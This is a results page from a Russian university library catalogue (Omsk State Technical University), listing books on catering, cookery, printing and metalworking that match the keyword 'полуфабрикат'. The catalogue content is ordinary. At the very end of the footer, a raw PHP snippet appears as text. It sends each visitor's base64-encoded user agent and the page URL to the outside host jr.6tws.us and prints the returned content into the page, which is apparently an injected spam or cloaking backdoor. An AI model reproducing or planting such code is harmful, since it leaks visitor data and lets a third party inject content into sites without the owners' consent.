Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

136 пользователей


Зарегистрированных: 1 

Лисина Марина Михайловна


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПОЛУФАБРИКАТ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 85
1. 
Экономическое обоснование проектов машиностроительных заводов [Текст] / И. С. Зотов [и др.], 1966. - 455, [1] с.
Ключевые слова 
МАШИНОСТРОИТЕЛЬНЫЙ -- ЗАВОД -- ПРОЕКТ -- СТРОИТЕЛЬСТВО -- РЕКОНСТРУИРОВАНИЕ -- ТЕХНИКО-ЭКОНОМИЧЕСКАЯ -- ТЕХНИЧЕСКАЯ -- ЭКОНОМИЧЕСКАЯ -- ЧАСТЬ -- ВЫПУСК -- ОСНОВНОЙ -- ФОНД -- КАПИТАЛЬНАЯ -- ЗАТРАТА -- ПОТРЕБНОСТЬ -- МАТЕРИАЛ -- ПОЛУФАБРИКАТ -- ТОПЛИВО -- ЭНЕРГИЯ -- ЗАРПЛАТА -- ЗАРАБОТНАЯ -- ПЛАТА -- РАСХОД -- ЦЕХОВОЙ -- ЦЕХ -- ОБЩЕЗАВОДСКИЙ -- ПРОДУКЦИЯ -- СЕБЕСТОИМОСТЬ -- ТЕХНИКО-ЭКОНОМИЧЕСКИЙ -- ТЕХНИЧЕСКИЙ -- ЭКОНОМИЧЕСКИЙ -- ПОКАЗАТЕЛЬ -- ЭФФЕКТИВНОСТЬ -- КАПИТАЛЬНОЕ -- ВЛОЖЕНИЕ -- ТЕХНИКА -- НОВАЯ -- РАБОТА -- ПРОЕКТНЫЙ -- ИНСТИТУТ -- ЭКСПЕРТИЗА -- ПРОЕКТ -- СМЕТА -- УТВЕРЖДЕНИЕ
Держатели документа (Информация об экземплярах) 
2. 
Сибирякова, Ольга Валерьевна. Разработка и применение методики экономической эффективности процессов переработки вторичного алюминиевого сырья [Текст] : автореф. дис. .. канд. экон. наук : 08.00.21 / Ольга Валерьевна Сибирякова, 1986. - 16 с.
Держатели документа (Информация об экземплярах) 
3. 
Творчество молодых: дизайн, реклама, полиграфия [Текст] : материалы VII Междунар. конф.студентов и аспирантов "Социальные проблемы современного города в визуальной культуре: творчество молодых" / ОмГТУ [и др.], 2008. - 165 с.
Ключевые слова 
ОМПИ -- ОМГТУ -- ВИЗУАЛЬНАЯ -- КУЛЬТУРА -- ГОРОД -- ОМСК -- ИНСТАЛЛЯЦИЯ -- КАРНАВАЛ -- ИЗОБРАЖЕНИЕ -- ТЕКСТОВАЯ -- НАДПИСЬ -- БУКВА -- ЦИФРА -- ИЗОБРАЗИТЕЛЬНОЕ -- ИСКУССТВО -- ЖУРНАЛ -- ПЕРИОДИЧЕСКОЕ -- ИЗДАНИЕ -- НЕОАРХАИКА -- БЭНКСИ -- СОЦИАЛЬНАЯ -- АГРЕССИЯ -- ХУДОЖЕСТВЕННЫЙ -- ЭПАТАЖ -- ИМИДЖ -- ЦВЕТ -- КИНОДИЗАЙН -- ОБРАЗ -- НАРУЖНАЯ -- ПЛАКАТ -- СОЦИАЛЬНЫЙ -- КОММЕРЧЕСКАЯ -- БУКВА -- КОНЬ -- КРЫЛАТЫЙ -- ГРАФИЧЕСКИЙ -- АФИША -- ТЕАТРАЛЬНАЯ -- НОВАТОРСТВО -- ТРАДИЦИЯ -- ХУДОЖЕСТВЕННАЯ -- КОВКА -- МЕТАЛЛ -- АРХИТЕКТУРА -- МОДЕРН -- НЕОМОДЕРН -- ОБРАЗ -- РУССКОЕ -- НАРОДНОЕ -- ТВОРЧЕСТВО -- ОБРАЗОВАТЕЛЬНАЯ -- УСЛУГА -- ЖЕНСКИЙ -- ТОЛЕРАНТНОСТЬ -- ПОЛУФАБРИКАТ -- НЕДВИЖИМОСТЬ -- ВУЗ -- ИНСТИТУТ -- ИНТЕРНЕТ-ЗАВИСИМОСТЬ -- РЕКЛАМНАЯ -- КАМПАНИЯ -- БЫСТРОЕ -- ПИТАНИЕ -- СОЛЯРИЙ -- САЛОН КРАСОТЫ -- ПРАВДА -- ВЫМЫСЕЛ -- СТЕРЕОТИП -- ПОСТМОДЕРНИЗМ -- САЙТ -- КОММУНИКАЦИЯ -- РЕКЛАМИРОВАНИЕ -- КАФЕ -- РЕСТОРАН -- ТКАНЬ -- ПЕЧАТЬ -- КНИГА -- МИНИАТЮРНАЯ -- УПАКОВКА -- БУМАГА -- ПРОЧНОСТЬ -- ПОЛИГРАФИЧЕСКОЕ -- ПРЕДПРИЯТИЕ -- УПРАВЛЕНИЕ -- МУАРООБРАЗОВАНИЕ -- ТЕСТОВАЯ -- СИСТЕМА -- ПЕЧАТНАЯ -- ФОРМА -- ТРАФАРЕТНАЯ -- КАРТОГРАФИЯ -- КАРТОН -- УПРОЧНЕНИЕ
Оглавление 
  • Кичигина, Анастасия Георгиевна. Проявление диахронизма в искусстве неоархаики: нарасчлененность обыденного и "чудесного" / А. Г. Кичигина. - с.18-20
  • Кичигина, Анастасия Георгиевна. исследование и творчество в искусстве неоархаики / А. Г. Кичигина. - с.20-22
  • Лугина, Яна Александровна. Психологическое назначение цвета в дизайне жизненного пространства человека / Я. А. Лугина, Т. М. Кошелева. - с.28-30
  • Лугина, Яна Александровна. Цветовое воздействие в рекламе / Я. А. Лугина, Ю. В. Байбарза. - с.64-66
  • Ткаченко, Ольга Николаевна. Коммерциализация социальной рекламы и социальная ответственность бизнеса / О. Н. Ткаченко, Е. В. Гомалач. - с.73-76
  • Бернадская, Юлия Сергеевна. Специфика рекламирования товарной категории "Полуфабрикаты" / Ю. С. Бернадская, И. Елизарова. - с.78-80
  • Ткаченко, Ольга Николаевна. Социальная реклама государственных институтов / О. Н. Ткаченко, Т. С. Манойло. - с.86-88
  • Бернадская, Юлия Сергеевна. Разработка рекламной кампании для предприятия быстрого питания / Ю. С. Бернадская, М. А. Пешехонова. - с.93-95
  • Бернадская, Юлия Сергеевна. Основные тенденции в рекламе салонов красоты и соляриев / Ю. С. Бернадская, Е. Попова. - с.95-96
  • Пригода, Нина Сергеевна. Межкультурная толерантность как императив взаимодействия культур / Н. С. Пригода, Л. М. Дмитриева. - с.97-99
  • Бернадская, Юлия Сергеевна. Специфика рекламирования радиоуправляемых моделей / Ю. С. Бернадская, Е. В. Стрельцова. - с.105-107
  • Ткаченко, Ольга Николаевна. Уровни реализации стереотипов средствами рекламы / О. Н. Ткаченко, Л. М. Дмитриева. - с.107-109
  • Ткаченко, Ольга Николаевна. Характеристика рекламы как явления постмодернизма / О. Н. Ткаченко, Л. М. Дмитриева. - с.109-112
  • Бернадская, Юлия Сергеевна. Особенности рекламирования кафе и ресторанов / Ю. С. Бернадская, Т. А. Шутимова. - с.121-123
  • Андреев, Рудольф Петрович. Термотрансферные технологии печати на тканях / Р. П. Андреев, Н. И. Антонова. - с.124-127
  • Варепо, Лариса Григорьевна. Печатьна композиционных упаковочных материалах: проблемы и причины их возникновения / Л. Г. Варепо, А. С. Борисова. - с.130-132
  • Варепо, Лариса Григорьевна. Моделирование оценки красковосприятия / Л. Г. Варепо, О. А. Колозова, А. С. Борисова. - с.142-144
  • Литунов, Сергей Николаевич. Исследование муарообразования при использовании структур с различной упаковкой ячеек / С. Н. Литунов, О Петраш, О. Фадеева. - с.144-148
Держатели документа (Информация об экземплярах) 
Полный текст
4. 
Панова, Лидия Александровна. Организация производства на предприятиях общественного питания (в экзаменационных вопросах и ответах) [Текст] : учеб. пособие / Л. А. Панова, 2005. - 318, [1] с.
Держатели документа (Информация об экземплярах) 

Учебное питание охватывает широкий круг вопросов, связанных с основными направлениями развития общественного питания. Здесь изложены основные вопросы по организации производства в соответствии с государственными требованиями к уровню подготовки выпускников колледжей, училищ, готовящих специалистов для общественого питания. Специальные разделы посвящены практическим вопросам по организации снабжения, складского хозяйства; Подробно описывается организация работы цехов, раздаточных; даны основы рациональной организации труда.

Подача материала в форме экзаменационных вопросов и ответов и текстовый материал позволяют успешно усвоить курс по организации производства на предприятиях общественного питания.

5. 
Экономическое обоснование проектов машиностроительных заводов [Текст] / И. С. Зотов [и др.], 1964. - 398, [1] с.
Держатели документа (Информация об экземплярах) 
6. 
Технология печатных процессов [Текст] : метод. указания по выполнению курсовой работы по специальности 261202 "Технология полиграфического производства" / ОмГТУ, 2010. - 51 с.
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст
7. 
Обработка давлением алюминиевых и жаропрочных сплавов [Текст] / Моск. авиац. технол. ин-т, 1967. - 122, [1] с.
Держатели документа (Информация об экземплярах) 
8. 
Холодильная техника и технология [Текст] : респ. межведомств. науч.-техн. сб. Вып. 45 / редкол.: И. Г. Чумак [и др.], 1987. - 110, [1] с.
Ключевые слова 
СБОРНИК -- ТЕПЛОМАССООБМЕН -- КРИОГЕННАЯ -- СИСТЕМА -- ЖИЗНЕОБЕСПЕЧЕНИЕ -- СТУПЕНЬ -- СЖАТИЕ -- ХОЛОДОПРОИЗВОДИТЕЛЬНОСТЬ -- ДЕТАНДЕР -- ЦЕОЛИТ -- АДСОРБЦИЯ -- ДВУОКИСЬ -- УГЛЕРОД -- ОХЛАЖДЕНИЕ -- ХЛОР -- ВОЗДУХООХЛАДИТЕЛЬ -- ОТТАИВАНИЕ -- ИНЕЙ -- ГИДРАВЛИЧЕСКОЕ -- СОПРОТИВЛЕНИЕ -- ЩЕЛЕВОЙ -- КАНАЛ -- ТЕПЛООБМЕННИК -- ИЗНОСОСТОЙКОСТЬ -- ПОРШНЕВОЙ -- КОМПРЕССОР -- ПРОФИЛИРОВАНИЕ -- КОЛЬЦО -- СКОРОМОРОЗИЛЬНЫЙ -- ТЕПЛООБМЕН -- СУШКА -- РЫБА -- ВОЗДУХОРАСПРЕДЕЛЕНИЕ -- СУШИЛКА -- КОЛБАСА -- ПОЛУФАБРИКАТ -- ХОЛОДИЛЬНОЕ -- КОНСЕРВИРОВАНИЕ -- ПРИРОДООХРАННАЯ -- ДЕЯТЕЛЬНОСТЬ
Держатели документа (Информация об экземплярах) 
9. 
Технология и оборудование для обработки тугоплавких, порошковых и композиционных материалов [Текст] : учеб. пособие для вузов по специальности "Обработка металлов давлением" / А. П. Коликов [и др.], 1989. - 382 с.
Держатели документа (Информация об экземплярах) 
10. 
Шатун, Любовь Григорьевна. Технология приготовления пищи [Текст] : учеб. / Л. Г. Шатун, 2006. - 478, [1] с.
Держатели документа (Информация об экземплярах) 

Учебник соответствует государственному общеобразовательному стандарту и дает необходимые представления по теории <механической> и <тепловой> обработки <продуктов>, расчетам сырья и <потерь> при обработке, технологии приготовления пищи с демонстрацией технологических карт и схем. ПРиведены многочисленные <кулинарные> <рецепты>.

Даны рекомендации по работе с нормативно-технологической документацией, составлению <меню>, <лечебному> <питанию>.

Для контроля знаний предложены контрольные измерители.

11. 
Леман, Хайнц. Материалы для переработки бумаги [Текст] : Пер. с нем. / Х. Леман, Л. Рихтер; Под ред. С. В. Бабурина, 1984. - 247 с.
Держатели документа (Информация об экземплярах) 
12. 
Фурс, Иван Николаевич. Технология производства продукции общественного питания [Текст] : Учеб. пособие для вузов по специальности "Коммерческая деятельность" / И. Н. Фурс, 2002. - 798 с.
Держатели документа (Информация об экземплярах) 

Данный курс является комплексной дисциплиной, включающей физиологические основы рационального питания, основы гигиены и санитарии, общие представления о технологии производства продуктов питания, технологии обработки сырья и приготовления полуфабрикатов. Рассмотрены вопросы контроля качества, товароведения продовольственных товаров, экономики общественного питания, организации производства и обслуживания и др.

13. 
Григорьев, Виктор Миронович. Управление микроструктурой керамики путем подавления массопереноса ионов щелочных металлов [Текст] : Автореф. дис. .. канд. техн. наук: 05.23.05 - Cтроительные материалы и изделия / В. М. Григорьев, 2002. - 26 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
14. 
Справочник технолога общественного питания [Текст] / А. И. Мглинец, Г. Н. Ловачева, Л. М. Алешина, 2000. - 415 с.
15. 
Уласевич, Марина Владимировна. Технология приготовления пищи [Текст] : Справ. пособие / М. В. Уласевич, 2000. - 398, [1] с.
Держатели документа (Информация об экземплярах) 
16. 
Правила устройства и безопасной эксплуатации трубопроводов пара и горячей воды. ПБ 10-573-03 [Текст] / Госгортехнадзор России, 2003. - 126, [1] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
17. 
Гудкова, Тамара Ивановна. Полиграфические материалы [Текст] : Учеб. для инж.-экон. специальностей полигр. вузов / Т. И. Гудкова, Л. А. Загаринская, 1982. - 224 с.
Держатели документа (Информация об экземплярах) 
18. 
Бирюкова, Вера Васильевна. Технология производства продукции общественного питания [Текст] : Учеб. пособие для вузов по специальности 060800 "Экономика и управление на предприятии (торговли и общественного питания)" / В. В. Бирюкова, Н. В. Шевченко, 2004. - 106 с.
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст
19. 
Позняковский, Валерий Михайлович. Экспертиза мяса и мясопродуктов [Текст] : Учеб. пособие для вузов по специальности "Товароведение и экспертиза товаров" / В. М. Позняковский, 2002. - 524 с.
Оглавление 
  • Химический состав мяса и мясопродуктов. - с.473-498
  • Порядок сертификации мяса, мясной продукции, мяса птицы, яйца и продуктов их переработки. - с.499-514

Книга содержит наиболее полный учебно-справочный материал по экспертизе мяса и мясопродуктов, включая свежее мясо и продукты из говядины, баранины, конины, оленины.

20. 
Маслов, Леонид Александрович. Кулинария [Текст] : Учеб. / Л. А. Маслов, 1957. - 295 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3022 - 18.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.42 с.12 запросов, 0.44c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;